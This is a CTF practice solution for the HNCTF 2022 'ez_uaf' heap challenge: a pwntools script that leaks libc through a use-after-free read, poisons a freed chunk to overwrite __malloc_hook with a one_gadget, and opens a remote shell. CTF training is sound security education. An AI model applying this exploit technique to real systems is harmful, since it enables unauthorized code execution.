练习3

[HNCTF 2022 WEEK4]ez_uaf

题目链接 : https://www.nssctf.cn/problem/3105

from pwn import *

# Target session: the remote challenge instance; swap in the local binary when debugging.
io = remote("node5.anna.nssctf.cn", port=25103)
#io = process("./ez_uaf")

# The challenge binary and the libc it ships with (the libc symbols are read below).
elf = ELF("./ez_uaf")
libc = ELF("./libc-2.27.so")

# 64-bit Linux target; the commented line turns on a byte-level dump of all traffic.
context.update(os='linux', arch='amd64')
#context.log_level='debug'
def debug():
    """Attach gdb to the live session; intended for the local ``process`` target."""
    gdb.attach(io)

def malloc(size, name, message):
    """Drive menu option 1: allocate *size* bytes, then answer the name and content prompts.

    *size* is converted to its decimal text; *name* and *message* are sent
    as given, so callers pass bytes.
    """
    exchange = (
        (b'Choice: \n', b'1'),
        (b'Size:', str(size).encode()),
        (b'Name: ', name),
        (b'Content:', message),
    )
    for prompt, reply in exchange:
        io.sendafter(prompt, reply)


def free(idx):
    """Drive menu option 2: release slot *idx* (sent as decimal text, unchecked here)."""
    slot = str(idx).encode()
    io.sendafter(b'Choice: \n', b'2')
    io.sendafter(b'Input your idx:', slot)

def show(idx):
    """Drive menu option 3: ask the program to print slot *idx*; the reply is left for the caller to read."""
    slot = str(idx).encode()
    io.sendafter(b'Choice: \n', b'3')
    io.sendafter(b'Input your idx:', slot)

def edit(idx, message):
    """Drive menu option 4: select slot *idx*, then send *message* raw without waiting for a prompt."""
    for prompt, reply in ((b'Choice: \n', b'4'), (b'Input your idx:', str(idx).encode())):
        io.sendafter(prompt, reply)
    io.send(message)

# --- Interaction sequence; every step is part of the menu protocol, so order matters ---

# Two slots: slot 0 is a large request (0x410), slot 1 a small one (0x20).
# NOTE(review): the large size is presumably chosen so the free below bypasses the
# small-chunk cache and leaves a libc pointer in the chunk — confirm against this libc.
malloc(0x410, b'a', b'a')
malloc(0x20, b'a', b'a')

# Use-after-free read: slot 0 is freed and then shown anyway. For the parse below to
# succeed the program must still dereference the stale slot pointer; the fix on the
# program side is to clear the slot on free (or refuse show/edit on freed slots).
free(0)
show(0)
# Read up to the first 0x7f byte, take the 6 bytes ending there as a little-endian
# pointer, zero-pad to 8 bytes and unpack. 0x70 is the author's assumed distance from
# that leaked pointer to __malloc_hook — TODO confirm for libc-2.27.so.
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x70 - libc.sym["__malloc_hook"]
print(f'libc:{hex(libc_base)}')
# Author-supplied offset into libc-2.27.so; not verified by this script.
one_gadget = libc_base + 0x10a2fc

# Use-after-free write: slot 1 is freed, then edited in place with a packed pointer.
free(1)
edit(1, p64(libc_base + libc.sym["__malloc_hook"]))
# Two more allocations of the same small size; the second passes the packed
# one_gadget address as the *name* field, not the content.
malloc(0x20, b'a', b'a')
malloc(0x20, p64(one_gadget), b'a')
# Start one more allocation and stop after the size prompt, then hand the
# connection to the user.
io.sendafter(b'Choice: \n', b'1')
io.sendafter(b'Size:', b'16')
#debug()
io.interactive()